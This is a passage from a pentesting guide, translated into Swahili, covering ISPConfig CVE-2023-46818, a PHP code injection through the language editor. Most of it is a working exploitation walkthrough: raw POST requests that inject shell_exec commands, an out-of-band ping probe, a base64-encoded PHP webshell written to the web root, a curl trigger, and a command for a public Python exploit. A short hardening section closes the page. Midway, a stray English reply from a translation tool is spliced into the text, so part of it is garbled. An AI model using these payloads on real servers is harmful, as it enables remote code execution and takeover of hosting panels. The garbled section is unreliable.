ISPConfig

Reading time: 5 minutes

Muhtasari

ISPConfig ni paneli ya udhibiti ya hosting ya chanzo wazi. Toleo la zamani la 3.2.x lilijumuisha kipengele cha mhariri wa faili za lugha ambacho, kinapowezeshwa kwa msimamizi mkuu, kiliruhusu arbitrary PHP code injection kupitia rekodi ya tafsiri iliyoharibika. Hii inaweza kutoa RCE katika muktadha wa seva ya wavuti na, kulingana na jinsi PHP inavyotekelezwa, privilege escalation.

Njia za msingi za default:

• Mizizi ya wavuti mara nyingi iko kwenye /var/www/ispconfig wakati inahudumiwa na php -S au kupitia Apache/nginx.
• Admin UI inapatikana kwenye HTTP(S) vhost (mara nyingine imefungwa kwa localhost tu; tumia SSH port-forward ikiwa inahitajika).

Vidokezo: Ikiwa paneli imefungwa kwa ndani (mfano 127.0.0.1:8080), itengeneze port-forward:

ssh -L 9001:127.0.0.1:8080 user@target
# then browse http://127.0.0.1:9001

Mhariri wa lugha PHP code injection (CVE-2023-46818)

• Imeathiriwa: ISPConfig hadi 3.2.11 (suluhisho limewekwa katika 3.2.11p1)
• Masharti ya awali:
• Ingia kama akaunti ya built-in superadmin admin (majukumu mengine hayagusiwi kulingana na muuzaji)
• Mhariri wa lugha lazima uwe umewezeshwa: admin_allow_langedit=yes katika /usr/local/ispconfig/security/security_settings.ini
• Athari: Admin aliye na uthibitisho anaweza kuingiza PHP yoyote inayotumwa ndani ya faili ya lugha na kutekelezwa na application, akipata RCE katika muktadha wa wavuti

References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below.

Mtiririko wa exploitation kwa mkono

1. Open/create a language file to obtain CSRF tokens

Tuma POST ya kwanza ili kuanzisha fomu na uchambue maeneo ya CSRF kutoka kwenye jibu la HTML (csrf_id, csrf_key). Mfano wa request path: /admin/language_edit.php.

2. Inject PHP via records[] and save

Wasilisha POST ya pili ikiwa ni pamoja na nywanja za CSRF na rekodi ya tafsiri yenye maudhui mabaya. Minimal command-execution probes:

POST /admin/language_edit.php HTTP/1.1
Host: 127.0.0.1:9001
Content-Type: application/x-www-form-urlencoded
Cookie: ispconfig_auth=...

lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?>

Out-of-band test (angalia ICMP):

records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?>

3. Andika faili na uweke webshell

Tumia file_put_contents kuunda faili chini ya njia inayofikiwa kupitia wavuti (kwa mfano, admin/):

records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?>

Kisha andika webshell rahisi ukitumia base64 ili kuepuka herufi mbaya katika mwili wa POST:

records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?>

I don't have the file contents. Please paste the markdown from src/network-services-pentesting/pentesting-web/ispconfig.md here (or paste the portion you want translated). I'll translate the English text to Swahili, keeping all code, tags, links, paths and specified technical names unchanged.

curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'

Ikiwa PHP inatekelezwa kama root (kwa mfano, kupitia php -S 127.0.0.1:8080 iliyoanzishwa na root), hii husababisha root RCE mara moja. Vinginevyo, unapata utekelezaji wa msimbo kama mtumiaji wa seva ya wavuti.

Python PoC

Exploit tayari-kutumika huendesha kiotomatiki utunzaji wa token na utoaji wa payload:

• https://github.com/bipbopbup/CVE-2023-46818-python-exploit

Mfano wa utekelezaji:

python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>

Hardening

• Sasisha hadi 3.2.11p1 au baadaye
• Zima mhariri wa lugha isipokuwa inahitajika kabisa:

admin_allow_langedit=no

• Epuka kuendesha paneli kama root; sanidi PHP-FPM au server ya wavuti ili kupunguza vibali
• Lazimisha uthibitishaji imara kwa akaunti ya ndani admin

Marejeo

• ISPConfig 3.2.11p1 Released (fixes language editor code injection)
• CVE-2023-46818 – NVD
• bipbopbup/CVE-2023-46818-python-exploit
• HTB Nocturnal: Root via ISPConfig language editor RCE